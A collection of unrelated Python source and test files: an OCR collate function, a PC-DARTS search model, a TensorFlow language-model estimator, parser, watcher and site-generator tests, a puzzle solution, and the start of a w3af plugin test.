range(batch_size): image = output_images[x] width = image.shape[2] inputs[x, :, :, :width] = image output_labels[x][:len(labels[x])] = labels[x] # list to str output_labels = [''.join(x) for x in output_labels] images = torch.cat([torch.from_numpy(t).unsqueeze(0) for t in inputs], 0) return images, output_labels
python
class Occurrence(object): """ An Occurrence is an incarnation of a recurring event for a given date. """ def __init__(self,event,start,end): self.event = event self.start = start self.end = end def __unicode__(self): return "%s to %s" %(self.start, self.end) def __cmp__(self, other): rank = cmp(self.start, other.start) if rank == 0: return cmp(self.end, other.end) return rank
python
# some modules use the old-style import: explicitly include # the new module when the old one is referenced hiddenimports = ["email.mime.text", "email.mime.multipart"]
python
import torch import torch.nn as nn import torch.nn.functional as F import copy from xnas.search_space.DARTS.ops import * from torch.autograd import Variable def channel_shuffle(x, groups): batchsize, num_channels, height, width = x.data.size() channels_per_group = num_channels // groups # reshape x = x.view(batchsize, groups, channels_per_group, height, width) x = torch.transpose(x, 1, 2).contiguous() # flatten x = x.view(batchsize, -1, height, width) return x class PcMixedOp(nn.Module): def __init__(self, C_in, C_out, stride, basic_op_list=None): super().__init__() self.k = 4 self.mp = nn.MaxPool2d(2, 2) self._ops = nn.ModuleList() assert basic_op_list is not None, "the basic op list cannot be none!" basic_primitives = basic_op_list for primitive in basic_primitives: op = OPS_[primitive](C_in//self.k, C_out//self.k, stride, affine=False) self._ops.append(op) def forward(self, x, weights): # channel proportion k=4 dim_2 = x.shape[1] xtemp = x[:, : dim_2//self.k, :, :] xtemp2 = x[:, dim_2//self.k:, :, :] assert len(self._ops) == len(weights) ''' temp1 = 0 for i, value in enumerate(weights): if value == 1: temp1 += self._ops[i](xtemp) if 0 < value < 1: temp1 += value * self._ops[i](xtemp)''' _x = [] for i, value in enumerate(weights): if value == 1: _x.append(self._ops[i](xtemp)) if 0 < value < 1: _x.append(value * self._ops[i](xtemp)) # reduction cell needs pooling before concat part_x = sum(_x) if part_x.shape[2] == x.shape[2]: ans = torch.cat([part_x, xtemp2], dim=1) else: ans = torch.cat([part_x, self.mp(xtemp2)], dim=1) ans = channel_shuffle(ans, self.k) # ans = torch.cat([ans[ : , dim_2//4:, :, :],ans[ : , : dim_2//4, :, :]],dim=1) # except channe shuffle, channel shift also works return ans # the search cell in darts class PcDartsCell(nn.Module): def __init__(self, n_nodes, C_pp, C_p, C, reduction_p, reduction, basic_op_list, multiplier): """ Args: n_nodes: # of intermediate n_nodes C_pp: C_out[k-2] C_p : C_out[k-1] C : C_in[k] (current) reduction_p: flag for whether the previous cell is reduction cell or not reduction: flag for whether the current cell is reduction cell or not """ super().__init__() self.reduction = reduction self.n_nodes = n_nodes self._multiplier = multiplier self.basic_op_list = basic_op_list # If previous cell is reduction cell, current input size does not match with # output size of cell[k-2]. So the output[k-2] should be reduced by preprocessing. if reduction_p: self.preproc0 = FactorizedReduce(C_pp, C, affine=False) else: self.preproc0 = ReluConvBn(C_pp, C, 1, 1, 0, affine=False) self.preproc1 = ReluConvBn(C_p, C, 1, 1, 0, affine=False) # generate dag self.dag = nn.ModuleList() for i in range(self.n_nodes): self.dag.append(nn.ModuleList()) for j in range(2+i): # include 2 input nodes # reduction should be used only for input node stride = 2 if reduction and j < 2 else 1 op = PcMixedOp(C, C, stride, self.basic_op_list) self.dag[i].append(op) def forward(self, s0, s1, sample, sample2): s0 = self.preproc0(s0) s1 = self.preproc1(s1) states = [s0, s1] w_dag = darts_weight_unpack(sample, self.n_nodes) w_w_dag = darts_weight_unpack(sample2, self.n_nodes) for edges, w_list, w_w_list in zip(self.dag, w_dag, w_w_dag): s_cur = sum(ww * edges[i](s, w) for i, (s, w, ww) in enumerate(zip(states, w_list, w_w_list))) states.append(s_cur) s_out = torch.cat(states[-self._multiplier:], 1) return s_out # PcDartsCNN class PcDartsCNN(nn.Module): def __init__(self, C=16, n_classes=10, n_layers=8, n_nodes=4, basic_op_list=[], multiplier=4): super().__init__() stem_multiplier = 3 self._multiplier = multiplier self.C_in = 3 # 3 self.C = C # 16 self.n_classes = n_classes # 10 self.n_layers = n_layers # 8 self.n_nodes = n_nodes # 4 self.basic_op_list = ['none','max_pool_3x3', 'avg_pool_3x3', 'skip_connect', 'sep_conv_3x3', 'sep_conv_5x5', 'dil_conv_3x3', 'dil_conv_5x5' ] if len(basic_op_list) == 0 else basic_op_list C_cur = stem_multiplier * C # 3 * 16 = 48 self.stem = nn.Sequential( nn.Conv2d(self.C_in, C_cur, 3, 1, 1, bias=False), nn.BatchNorm2d(C_cur) ) # for the first cell, stem is used for both s0 and s1 # [!] C_pp and C_p is output channel size, but C_cur is input channel size. C_pp, C_p, C_cur = C_cur, C_cur, C # 48 48 16 self.cells = nn.ModuleList() reduction_p = False for i in range(n_layers): # Reduce featuremap size and double channels in 1/3 and 2/3 layer. if i in [n_layers // 3, 2 * n_layers // 3]: C_cur *= 2 reduction = True else: reduction = False cell = PcDartsCell(n_nodes, C_pp, C_p, C_cur, reduction_p, reduction, self.basic_op_list, multiplier) reduction_p = reduction self.cells.append(cell) C_cur_out = C_cur * n_nodes C_pp, C_p = C_p, C_cur_out self.gap = nn.AdaptiveAvgPool2d(1) self.linear = nn.Linear(C_p, n_classes) # number of edges per cell self.num_edges = sum(list(range(2, self.n_nodes + 2))) # whole edges self.all_edges = 2 * self.num_edges def forward(self, x, sample, sample2): s0 = s1 = self.stem(x) for i, cell in enumerate(self.cells): if cell.reduction: alphas_reduce = sample[self.num_edges:] betas_reduce = sample2[self.num_edges:] weights = F.softmax(alphas_reduce, dim=-1) n = 3 start = 2 weights2 = F.softmax(betas_reduce[0:2], dim=-1) for i in range(self.n_nodes - 1): end = start + n tw2 = F.softmax(betas_reduce[start:end], dim=-1) start = end n += 1 weights2 = torch.cat([weights2, tw2], dim=0) else: alphas_normal = sample[0:self.num_edges] betas_normal = sample2[0:self.num_edges] weights = F.softmax(alphas_normal, dim=-1) n = 3 start = 2 weights2 = F.softmax(betas_normal[0:2], dim=-1) for i in range(self.n_nodes - 1): end = start + n tw2 = F.softmax(betas_normal[start:end], dim=-1) start = end n += 1 weights2 = torch.cat([weights2, tw2], dim=0) s0, s1 = s1, cell(s0, s1, weights, weights2) out = self.gap(s1) out = out.view(out.size(0), -1) # flatten logits = self.linear(out) return logits def genotype(self, theta, theta2): Genotype = namedtuple( 'Genotype', 'normal normal_concat reduce reduce_concat') a_norm = theta[0:self.num_edges] a_reduce = theta[self.num_edges:] b_norm = theta2[0:self.num_edges] b_reduce = theta2[self.num_edges:] weightn = F.softmax(a_norm, dim=-1) weightr = F.softmax(a_reduce, dim=-1) n = 3 start = 2 weightsn2 = F.softmax(b_norm[0:2], dim=-1) weightsr2 = F.softmax(b_reduce[0:2], dim=-1) for i in range(self.n_nodes - 1): end = start + n tn2 = F.softmax(b_norm[start:end], dim=-1) tw2 = F.softmax(b_reduce[start:end], dim=-1) start = end n += 1 weightsn2 = torch.cat([weightsn2, tn2], dim=0) weightsr2 = torch.cat([weightsr2, tw2], dim=0) theta_norm = darts_weight_unpack(weightn, self.n_nodes) theta_reduce = darts_weight_unpack(weightr, self.n_nodes) theta2_norm = darts_weight_unpack(weightsn2, self.n_nodes) theta2_reduce = darts_weight_unpack(weightsr2, self.n_nodes) for t, etheta in enumerate(theta_norm): for tt, eetheta in enumerate(etheta): theta_norm[t][tt] *= theta2_norm[t][tt] for t, etheta in enumerate(theta_reduce): for tt, eetheta in enumerate(etheta): theta_reduce[t][tt] *= theta2_reduce[t][tt] gene_normal = pc_parse_from_numpy( theta_norm, k=2, basic_op_list=self.basic_op_list) gene_reduce = pc_parse_from_numpy( theta_reduce, k=2, basic_op_list=self.basic_op_list) concat = range(2 + self.n_nodes - self._multiplier, 2 + self.n_nodes) # concat all intermediate nodes return Genotype(normal=gene_normal, normal_concat=concat, reduce=gene_reduce, reduce_concat=concat) def pc_parse_from_numpy(alpha, k, basic_op_list=None): """ parse continuous alpha to discrete gene. alpha is ParameterList: ParameterList [ Parameter(n_edges1, n_ops), Parameter(n_edges2, n_ops), ... ] gene is list: [ [('node1_ops_1', node_idx), ..., ('node1_ops_k', node_idx)], [('node2_ops_1', node_idx), ..., ('node2_ops_k', node_idx)], ... ] each node has two edges (k=2) in CNN. """ gene = [] assert basic_op_list[0] == 'none' # assume last PRIMITIVE is 'none' # 1) Convert the mixed op to discrete edge (single op) by choosing top-1 weight edge # 2) Choose top-k edges per node by edge score (top-1 weight in edge) for edges in alpha: # edges: Tensor(n_edges, n_ops) edge_max, primitive_indices = torch.topk( torch.tensor(edges[:, 1:]), 1) # ignore 'none' topk_edge_values, topk_edge_indices = torch.topk(edge_max.view(-1), k) node_gene = [] for edge_idx in topk_edge_indices: prim_idx = primitive_indices[edge_idx] prim = basic_op_list[prim_idx+1] node_gene.append((prim, edge_idx.item())) gene.append(node_gene) return gene def _PcdartsCNN(): from xnas.core.config import cfg return PcDartsCNN( C=cfg.SPACE.CHANNEL, n_classes=cfg.SEARCH.NUM_CLASSES, n_layers=cfg.SPACE.LAYERS, n_nodes=cfg.SPACE.NODES, basic_op_list=cfg.SPACE.BASIC_OP)
python
# This is just a demo file print("Hello world") print("this is update to my previous code")
python
import os import asyncio import sys from typing import Any, Dict, Union, List # noqa from tomodachi.watcher import Watcher def test_watcher_auto_root() -> None: watcher = Watcher() assert watcher.root == [os.path.realpath(sys.argv[0].rsplit('/', 1)[0])] def test_watcher_empty_directory() -> None: root_path = '{}/tests/watcher_root/empty'.format(os.path.realpath(os.getcwd())) watcher = Watcher(root=[root_path]) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 0 def test_watcher_default_ignored_directory() -> None: root_path = '{}/tests/watcher_root/__tmp__'.format(os.path.realpath(os.getcwd())) watcher = Watcher(root=[root_path]) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 0 def test_watcher_configurable_ignored_directory() -> None: root_path = '{}/tests/watcher_root/configurable_ignored'.format(os.path.realpath(os.getcwd())) watcher = Watcher(root=[root_path]) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 1 watcher = Watcher(root=[root_path], configuration={'options': {'watcher': {'ignored_dirs': ['configurable_ignored']}}}) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 0 def test_watcher_callback(loop: Any) -> None: root_path = '{}/tests/watcher_root'.format(os.path.realpath(os.getcwd())) watcher = Watcher(root=[root_path]) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 2 result = watcher.update_watched_files() assert result == {} watcher.watched_files = {'_test': 0} watcher.watched_files_crc = {'_test': ''} result = watcher.update_watched_files(reindex=True) assert len(result.get('added', 0)) == 2 assert len(result.get('removed', 0)) == 1 assert len(result.get('updated', 0)) == 0 class Test(): callbacks_run = {} # type: Dict[int, bool] @classmethod async def _async(cls) -> None: async def cb1(updated_files: Union[List, set]) -> None: cls.callbacks_run[1] = True async def cb2(updated_files: Union[List, set]) -> None: cls.callbacks_run[2] = True task = await watcher.watch(callback_func=cb1) await asyncio.sleep(1.0) task.cancel() watcher.watched_files = {'_test': 0} watcher.watched_files_crc = {'_test': ''} task = await watcher.watch(callback_func=cb2) await asyncio.sleep(1.0) task.cancel() assert cls.callbacks_run.get(1) is None assert cls.callbacks_run.get(2) is True loop.run_until_complete(Test._async())
python
import tensorflow as tf import numpy as np from optimizer import distributed_optimizer from task_module import pretrain, classifier, pretrain_albert import tensorflow as tf try: from distributed_single_sentence_classification.model_interface import model_zoo except: from distributed_single_sentence_classification.model_interface import model_zoo import tensorflow as tf import numpy as np from optimizer import optimizer from model_io import model_io from utils.bert import bert_seq_utils, bert_seq_sample_utils from task_module import classifier from task_module import tsa_pretrain import tensorflow as tf from metric import tf_metrics def train_metric(input_ids, predicted_logits, features, **kargs): labels = input_ids[:, 1:] # <S>,1,2,3,<T>,<PAD>, <PAD> logits = predicted_logits[:, :-1] # 1,2,3,<T>, xxx, xxx input_id_logits = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=labels, logits=logits) if kargs.get('mask_type', 'left2right') == 'left2right': tf.logging.info("***** using left2right mask and loss *****") sequence_mask = tf.to_float(tf.not_equal(features['input_ori_ids'][:, 1:], kargs.get('[PAD]', 0))) elif kargs.get('mask_type', 'left2right') == 'seq2seq': tf.logging.info("***** using seq2seq mask and loss *****") sequence_mask = tf.to_float(features['segment_ids'][:, 1:]) if not kargs.get('use_tpu', False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) # sequence_mask = tf.to_float(tf.not_equal(labels, # kargs.get('[PAD]', 0))) per_example_perplexity = tf.reduce_sum(input_id_logits * sequence_mask, axis=-1) # batch per_example_perplexity /= tf.reduce_sum(sequence_mask, axis=-1) # batch perplexity = tf.reduce_mean(tf.exp(per_example_perplexity)) lm_token_accuracy = tf.equal( tf.cast(labels, tf.int32), tf.cast(tf.argmax(logits, axis=-1), tf.int32)) lm_token_accuracy = tf.reduce_sum(tf.cast(lm_token_accuracy, tf.float32) * sequence_mask, axis=-1) lm_token_accuracy /= tf.reduce_sum(sequence_mask, axis=-1) # batch return { "perplexity": perplexity, "token_acc": tf.reduce_mean(lm_token_accuracy) } def eval_metric(input_ids, predicted_logits, sequence_mask): labels = input_ids[:, 1:] # <S>,1,2,3,<T>,<PAD>, <PAD> logits = predicted_logits[:, :-1] # 1,2,3,<T>, xxx, xxx input_id_logits = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=labels, logits=logits) # sequence_mask = tf.to_float(tf.not_equal(labels, # kargs.get('[PAD]', 0))) per_example_perplexity = tf.reduce_sum(input_id_logits * sequence_mask, axis=-1) # batch per_example_perplexity /= tf.reduce_sum(sequence_mask, axis=-1) # batch perplexity = tf.exp(per_example_perplexity) ppl_avg = tf.metrics.mean(values=perplexity) lm_token_accuracy = tf.metrics.accuracy( labels=tf.cast(labels, tf.int32), predictions=tf.cast(tf.argmax(logits, axis=-1), tf.int32), weights=sequence_mask) return { "perplexity":ppl_avg, "token_acc":lm_token_accuracy } def classifier_model_fn_builder( model_config, num_labels, init_checkpoint, model_reuse=None, load_pretrained=True, model_io_config={}, opt_config={}, exclude_scope="", not_storage_params=[], target="a", **kargs): def model_fn(features, labels, mode, params): model_api = model_zoo(model_config) seq_features = {} for key in features: seq_features[key] = features[key] if 'input_ori_ids' in features: seq_features['input_ids'] = features["input_ori_ids"] else: features['input_ori_ids'] = seq_features['input_ids'] model = model_api(model_config, seq_features, labels, mode, target, reuse=tf.AUTO_REUSE, **kargs) if mode == tf.estimator.ModeKeys.TRAIN: dropout_prob = model_config.dropout_prob else: dropout_prob = 0.0 if model_io_config.fix_lm == True: scope = model_config.scope + "_finetuning" else: scope = model_config.scope # if mode == tf.estimator.ModeKeys.TRAIN: if kargs.get('mask_type', 'left2right') == 'left2right': tf.logging.info("***** using left2right mask and loss *****") sequence_mask = tf.to_float(tf.not_equal(features['input_ori_ids'][:, 1:], kargs.get('[PAD]', 0))) elif kargs.get('mask_type', 'left2right') == 'seq2seq': tf.logging.info("***** using seq2seq mask and loss *****") sequence_mask = tf.to_float(features['segment_ids'][:, 1:]) if not kargs.get('use_tpu', False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) # batch x seq_length print(model.get_sequence_output_logits().get_shape(), "===logits shape===") seq_loss = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=features['input_ori_ids'][:, 1:], logits=model.get_sequence_output_logits()[:, :-1]) per_example_loss = tf.reduce_sum(seq_loss*sequence_mask, axis=-1) / (tf.reduce_sum(sequence_mask, axis=-1)+1e-10) loss = tf.reduce_mean(per_example_loss) model_io_fn = model_io.ModelIO(model_io_config) pretrained_tvars = model_io_fn.get_params(model_config.scope, not_storage_params=not_storage_params) lm_pretrain_tvars = model_io_fn.get_params("cls/predictions", not_storage_params=not_storage_params) pretrained_tvars.extend(lm_pretrain_tvars) use_tpu = 1 if kargs.get('use_tpu', False) else 0 if load_pretrained == "yes": use_tpu = 1 if kargs.get('use_tpu', False) else 0 scaffold_fn = model_io_fn.load_pretrained(pretrained_tvars, init_checkpoint, exclude_scope=exclude_scope, use_tpu=use_tpu) else: scaffold_fn = None if mode == tf.estimator.ModeKeys.TRAIN: if kargs.get('use_tpu', False): optimizer_fn = optimizer.Optimizer(opt_config) use_tpu = 1 tf.logging.info("***** using tpu with tpu-captiable optimizer *****") else: optimizer_fn = distributed_optimizer.Optimizer(opt_config) use_tpu = 0 tf.logging.info("***** using gpu with gpu-captiable optimizer *****") tvars = pretrained_tvars model_io_fn.print_params(tvars, string=", trainable params") update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) with tf.control_dependencies(update_ops): train_op = optimizer_fn.get_train_op(loss, tvars, opt_config.init_lr, opt_config.num_train_steps, use_tpu=use_tpu) train_metric_dict = train_metric(features['input_ori_ids'], model.get_sequence_output_logits(), seq_features, **kargs) if not kargs.get('use_tpu', False): for key in train_metric_dict: tf.summary.scalar(key, train_metric_dict[key]) tf.summary.scalar('learning_rate', optimizer_fn.learning_rate) tf.logging.info("***** logging metric *****") tf.summary.scalar("causal_attenion_mask_length", tf.reduce_sum(model.attention_mask)) tf.summary.scalar("bi_attenion_mask_length", tf.reduce_sum(model.bi_attention_mask)) if kargs.get('use_tpu', False): estimator_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=loss, train_op=train_op, scaffold_fn=scaffold_fn) else: estimator_spec = tf.estimator.EstimatorSpec( mode=mode, loss=loss, train_op=train_op) return estimator_spec elif mode == tf.estimator.ModeKeys.EVAL: if kargs.get('mask_type', 'left2right') == 'left2right': tf.logging.info("***** using left2right mask and loss *****") sequence_mask = tf.to_float(tf.not_equal(features['input_ori_ids'][:, 1:], kargs.get('[PAD]', 0))) elif kargs.get('mask_type', 'left2right') == 'seq2seq': tf.logging.info("***** using seq2seq mask and loss *****") sequence_mask = tf.to_float(features['segment_ids'][:, 1:]) if not kargs.get('use_tpu', False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) if not kargs.get('use_tpu', False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) gpu_eval_metrics = eval_metric(features['input_ori_ids'], model.get_sequence_output_logits(), sequence_mask, mask_type=kargs.get('mask_type', 'left2right')) else: tpu_eval_metrics = (eval_metric, [ features['input_ori_ids'], model.get_sequence_output_logits(), sequence_mask ]) print("===tpu metric==", tpu_eval_metrics, "==tpu metric++") if kargs.get('use_tpu', False): estimator_spec = tf.contrib.tpu.TPUEstimatorSpec( mode=mode, loss=loss, eval_metrics=tpu_eval_metrics, scaffold_fn=scaffold_fn) else: estimator_spec = tf.estimator.EstimatorSpec(mode=mode, loss=loss, eval_metric_ops=gpu_eval_metrics) return estimator_spec elif mode == tf.estimator.ModeKeys.PREDICT: if kargs.get('predict_type', 'sample_sequence') == 'sample_sequence': results = bert_seq_sample_utils.sample_sequence(model_api, model_config, mode, features, target="", start_token=kargs.get("start_token_id", 101), batch_size=None, context=features.get("context", None), temperature=kargs.get("sample_temp", 1.0), n_samples=kargs.get("n_samples", 1), top_k=0, end_token=kargs.get("end_token_id", 102), greedy_or_sample="greedy", gumbel_temp=0.01, estimator="stop_gradient", back_prop=True, swap_memory=True, seq_type=kargs.get("seq_type", "seq2seq"), mask_type=kargs.get("mask_type", "seq2seq"), attention_type=kargs.get('attention_type', 'normal_attention') ) # stop_gradient output: # samples, mask_sequence, presents, logits, final sampled_token = results['samples'] sampled_token_logits = results['logits'] mask_sequence = results['mask_sequence'] estimator_spec = tf.estimator.EstimatorSpec( mode=mode, predictions={ 'token':sampled_token, "logits":sampled_token_logits, "mask_sequence":mask_sequence }, export_outputs={ "output":tf.estimator.export.PredictOutput( { 'token':sampled_token, "logits":sampled_token_logits, "mask_sequence":mask_sequence } ) } ) return estimator_spec elif kargs.get('predict_type', 'sample_sequence') == 'infer_inputs': sequence_mask = tf.to_float(tf.not_equal(features['input_ids'][:, 1:], kargs.get('[PAD]', 0))) if kargs.get('mask_type', 'left2right') == 'left2right': tf.logging.info("***** using left2right mask and loss *****") sequence_mask = tf.to_float(tf.not_equal(features['input_ori_ids'][:, 1:], kargs.get('[PAD]', 0))) elif kargs.get('mask_type', 'left2right') == 'seq2seq': tf.logging.info("***** using seq2seq mask and loss *****") sequence_mask = tf.to_float(features['segment_ids'][:, 1:]) if not kargs.get('use_tpu', False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) output_logits = model.get_sequence_output_logits()[:, :-1] # output_logits = tf.nn.log_softmax(output_logits, axis=-1) output_id_logits = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=features['input_ids'][:, 1:], logits=output_logits) per_example_perplexity = tf.reduce_sum(output_id_logits * sequence_mask, axis=-1) # batch per_example_perplexity /= tf.reduce_sum(sequence_mask, axis=-1) # batch perplexity = tf.exp(per_example_perplexity) estimator_spec = tf.estimator.EstimatorSpec( mode=mode, predictions={ 'token':features['input_ids'][:, 1:], "logits":output_id_logits, 'perplexity':perplexity, "all_logits":output_logits }, export_outputs={ "output":tf.estimator.export.PredictOutput( { 'token':features['input_ids'][:,1:], "logits":output_id_logits, 'perplexity':perplexity, "all_logits":output_logits } ) } ) return estimator_spec else: raise NotImplementedError() return model_fn
python
# -*- coding: utf-8 -*- '''test cases for config_loader module''' import unittest import os import shutil import cray.craylib.config_loader as config_loader from cray.craylib.generate_manager import GenerateManager ROOT_DIR = os.path.join(os.path.dirname(__file__), "test_site") SITE_DIR = os.path.join(os.path.dirname(__file__), "_site") def get_test_suites(): '''Return test cases as a suite in this module''' suite = unittest.TestSuite() suite.addTest(SiteGenerationTestCase()) return suite class SiteGenerationTestCase(unittest.TestCase): '''Test case for post generation''' def runTest(self): '''Run test''' if os.path.exists(SITE_DIR): shutil.rmtree(SITE_DIR, ignore_errors=True) conf_loader = config_loader.ConfigLoader(ROOT_DIR) self.assertTrue(conf_loader.parse_config()) generate_manager = GenerateManager(ROOT_DIR) generate_manager.read_config(conf_loader) generate_manager.generate_site() self.assertTrue(os.path.exists(SITE_DIR)) index_path = os.path.join(SITE_DIR, 'index.html') about_path = os.path.join(SITE_DIR, 'about', 'index.html') hello_post_path = os.path.join(SITE_DIR, 'post', '2017', '6', '2', 'hello-world', \ 'index.html') rss_path = os.path.join(SITE_DIR, 'feed.xml') self.assertTrue(os.path.exists(index_path)) self.assertTrue(os.path.exists(about_path)) self.assertTrue(os.path.exists(hello_post_path)) self.assertTrue(os.path.exists(rss_path)) index_content = r'''<html> <head> <meta charset="utf-8"> <title>Index</title> </head> <body> <header class="site-header"> <div class="wrapper"> <a class="site-title" href="/">Index</a> <nav class="site-nav"> <!-- <a href="#" class="menu-icon"> <svg viewBox="0 0 18 15"> <path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z"/> <path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z"/> <path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z"/> </svg> </a> --> <div class="trigger"> <a class="page-link" href="/about/">about</a> </div> </nav> </div> </header> <h1>Post list:</h1> <ul id="navigation"> <li><a href="post/2017/6/2/hello-world">Welcome to Cray!</a></li> </ul> <footer> <h3>Powered by Bolun 2013 - 2017</h3> </footer> </body> </html>''' about_content = r'''<html> <head> <meta charset="utf-8"> <title>about</title> </head> <body> <header class="site-header"> <div class="wrapper"> <a class="site-title" href="/">Index</a> <nav class="site-nav"> <!-- <a href="#" class="menu-icon"> <svg viewBox="0 0 18 15"> <path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z"/> <path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z"/> <path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z"/> </svg> </a> --> <div class="trigger"> <a class="page-link" href="/about/">about</a> </div> </nav> </div> </header> <h1>about</h1> <div><p>This is the first test page for test_site</p></div> <footer> <h3>Powered by Bolun 2013 - 2017</h3> </footer> </body> </html>''' hello_content = r'''<html> <head> <meta charset="utf-8"> <title>Welcome to Cray!</title> </head> <body> <header class="site-header"> <div class="wrapper"> <a class="site-title" href="/">Index</a> <nav class="site-nav"> <!-- <a href="#" class="menu-icon"> <svg viewBox="0 0 18 15"> <path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z"/> <path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z"/> <path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z"/> </svg> </a> --> <div class="trigger"> <a class="page-link" href="/about/">about</a> </div> </nav> </div> </header> <h1>Welcome to Cray!</h1> <p>2017-06-02 22:22:22</p> <div><p>hello world!</p></div> <footer> <h3>Powered by Bolun 2013 - 2017</h3> </footer> </body> </html>''' rss_title_regex = '<title>Demo</title>' rss_description_regex = '<description>demo site description</description>' rss_item_title_regex = '<title>Welcome to Cray!</title>' rss_item_description_regex = r'<description>\s+hello world!</description>' rss_item_link_regex = r'<link>http://www.demo.com/post/2017/6/2/hello-world</link>' rss_item_guid_regex = r'<guid isPermaLink=\"false\">5876f9d8-bd18-3935-9d2f-5dc36c00ae5f</guid>' rss_item_pubdate_regex = r'<pubDate>2017-06-02 22:22:22</pubDate>\s+</item>' self.maxDiff = None with open(index_path) as index_fd: self.assertEqual(index_content, index_fd.read()) with open(about_path) as about_fd: self.assertEqual(about_content, about_fd.read()) with open(hello_post_path) as hello_fd: self.assertEqual(hello_content, hello_fd.read()) with open(rss_path) as rss_fd: cotent = rss_fd.read() self.assertRegex(cotent, rss_title_regex) self.assertRegex(cotent, rss_description_regex) self.assertRegex(cotent, rss_item_title_regex) self.assertRegex(cotent, rss_item_description_regex) self.assertRegex(cotent, rss_item_link_regex) self.assertRegex(cotent, rss_item_guid_regex) self.assertRegex(cotent, rss_item_pubdate_regex) if os.path.exists(SITE_DIR): shutil.rmtree(SITE_DIR, ignore_errors=True)
python
#!/usr/bin/env python3 import sys import time import math def go(l, n, partials): return (partials[-1] - partials[n]) % 10 def fft(l): """Fucked Fourier Transform""" partials = [0] sum = 0 for v in l: sum += v partials.append(sum) x = [] for i, y in enumerate(l): x.append(go(l, i, partials)) return x def main(args): orig_data = [int(x) for x in [s.strip() for s in sys.stdin][0]] data = orig_data * 10000 offset = int(''.join(str(x) for x in data[:7])) assert offset*2 > len(data) data = data[offset:] for i in range(100): data = fft(data) print(''.join(str(x) for x in data[:8])) if __name__ == '__main__': main(sys.argv)
python
import enolib def test_querying_an_existing_single_line_required_string_comment_from_a_section_produces_the_expected_result(): input = ("> comment\n" "# section") output = enolib.parse(input).section('section').required_string_comment() expected = ("comment") assert output == expected def test_querying_an_existing_two_line_required_string_comment_from_a_section_produces_the_expected_result(): input = (">comment\n" "> comment\n" "# section") output = enolib.parse(input).section('section').required_string_comment() expected = ("comment\n" " comment") assert output == expected def test_querying_an_existing_required_string_comment_with_blank_lines_from_a_section_produces_the_expected_result(): input = (">\n" "> comment\n" ">\n" "> comment\n" ">\n" "> comment\n" ">\n" "# section") output = enolib.parse(input).section('section').required_string_comment() expected = (" comment\n" "\n" " comment\n" "\n" "comment") assert output == expected def test_querying_an_optional_existing_string_comment_from_a_section_produces_the_expected_result(): input = ("> comment\n" "# section") output = enolib.parse(input).section('section').optional_string_comment() expected = ("comment") assert output == expected def test_querying_an_optional_missing_string_comment_from_a_section_produces_the_expected_result(): input = ("# section") output = enolib.parse(input).section('section').optional_string_comment() assert output == None
python
""" test_finger_pks.py Copyright 2012 Andres Riancho This file is part of w3af, http://w3af.org/ . w3af is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. w3af is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with w3af; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ from nose.plugins.attrib import attr from w3af.plugins.tests.helper import PluginTest, PluginConfig class TestFingerPKS(PluginTest): base_url = 'http://www.bonsai-sec.com/' _run_configs = { 'cfg': { 'target': base_url, 'plugins': {'infrastructure': (PluginConfig('finger_pks'),)} } } @attr('ci_fails') def test_find_pks_email(self): cfg = self._run_configs['cfg'] 